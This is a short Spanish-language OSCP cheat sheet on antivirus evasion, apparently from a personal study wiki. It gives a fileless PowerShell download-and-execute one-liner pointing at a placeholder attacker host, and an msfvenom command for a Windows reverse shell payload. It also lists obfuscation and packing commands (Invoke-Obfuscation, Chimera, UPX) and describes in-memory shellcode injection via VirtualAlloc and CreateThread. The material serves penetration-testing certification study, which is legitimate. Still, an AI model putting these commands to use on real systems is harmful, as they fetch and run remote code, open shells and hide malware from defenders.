# AV evasion > Cuando hay antivirus y tu payload muere al tocar disco. Fuente: oscp.trastero.org/avevasion. ## PowerShell en memoria (no toca disco) ```powershell IEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1') # fileless powershell -ExecutionPolicy Bypass -File evasion.ps1 powershell -encodedCommand JABjAG8AZABl... # comando en base64 (UTF-16LE) ``` ## Generar y ofuscar ```bash msfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # → msfvenom python3 ps_encoder.py -s evasion.ps1 # darkoperator/Invoke-Obfuscation ./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1 # Chimera: ofusca strings/variables ``` ## Inyección directa (P/Invoke) Script PS que reserva memoria con **VirtualAlloc**, copia el shellcode y lanza **CreateThread** → ejecuta sin escribir un .exe al disco (evade el escaneo on-write). ## Otras tools - **Shellter** (inyecta en un .exe legítimo), **Veil**, **Nim/C# loaders**. - **UPX** para empaquetar y cambiar la firma: `upx -9 rev.exe`. > Nota OSCP: la evasión de AV está permitida (no es un escáner de vulns prohibido → Reglas de herramientas); rara vez hace falta en el examen, pero alguna máquina la pide. Relacionado: Client-side attacks · msfvenom · Reverse shell · OSCP MOC